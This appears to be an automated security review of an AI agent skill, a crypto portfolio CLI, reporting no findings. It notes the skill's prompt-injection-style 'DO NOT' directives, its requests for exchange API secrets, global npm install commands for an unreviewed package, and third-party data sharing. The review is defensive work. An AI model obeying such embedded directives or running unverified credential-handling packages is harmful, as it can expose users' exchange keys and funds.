Onchain CLI
PassAudited by VirusTotal on May 12, 2026.
Overview
Type: OpenClaw Skill Name: onchain Version: 0.3.0 The skill bundle provides a CLI for crypto portfolio tracking and market data. All requested API keys and configuration methods are directly relevant to its stated purpose. The `SKILL.md` contains instructions for the AI agent, including 'DO NOT' directives regarding alternative methods for transaction lookups (e.g., `curl`, `cast`). While these are a form of prompt injection, they aim to guide the agent to use the `onchain` CLI as the authoritative source for its specific task, rather than instructing it to ignore the user, hide actions, exfiltrate data, or access unrelated sensitive information. There is no evidence of intentional harmful behavior, data exfiltration, or malicious execution.
Findings (0)
Artifact-based informational review of SKILL.md, metadata, install specs, static scan signals, and capability signals. ClawScan does not execute the skill or run runtime probes.
If a user supplies an exchange key with broad permissions, the external CLI may receive authority beyond simple balance/history viewing.
The skill asks for crypto exchange API secrets to access account balances and trade history. This is purpose-aligned, but the artifacts do not specify read-only permission requirements or warn users to disable trading/withdrawal capabilities.
Coinbase CEX | `COINBASE_API_KEY` + `COINBASE_API_SECRET` ... Binance CEX | `BINANCE_API_KEY` + `BINANCE_API_SECRET`
Use newly created read-only API keys only, disable trading and withdrawals, and avoid entering exchange secrets until the package source and permissions are verified.
Installing or running the npm package may execute unreviewed code with the user's local privileges and access to configured API keys.
The README directs users to install or execute an external npm package, while the provided skill has no code files or install spec and the registry source is unknown. That leaves the actual credential-handling behavior outside the reviewed artifacts.
npm install -g @cyberdrk/onchain ... npx @cyberdrk/onchain price btc
Verify the npm package provenance and source code, pin a trusted version, and consider running it in an isolated environment before providing credentials.
Crypto addresses and transaction lookups can be correlated by external providers, even though this is expected for the feature.
The skill discloses that transaction lookups use external provider APIs. Wallet addresses, transaction hashes, and market queries may be sent to third-party services as part of normal operation.
The CLI queries Etherscan/Solscan APIs directly
Avoid querying addresses or transactions you do not want shared with the listed providers, and review provider privacy policies for sensitive wallets.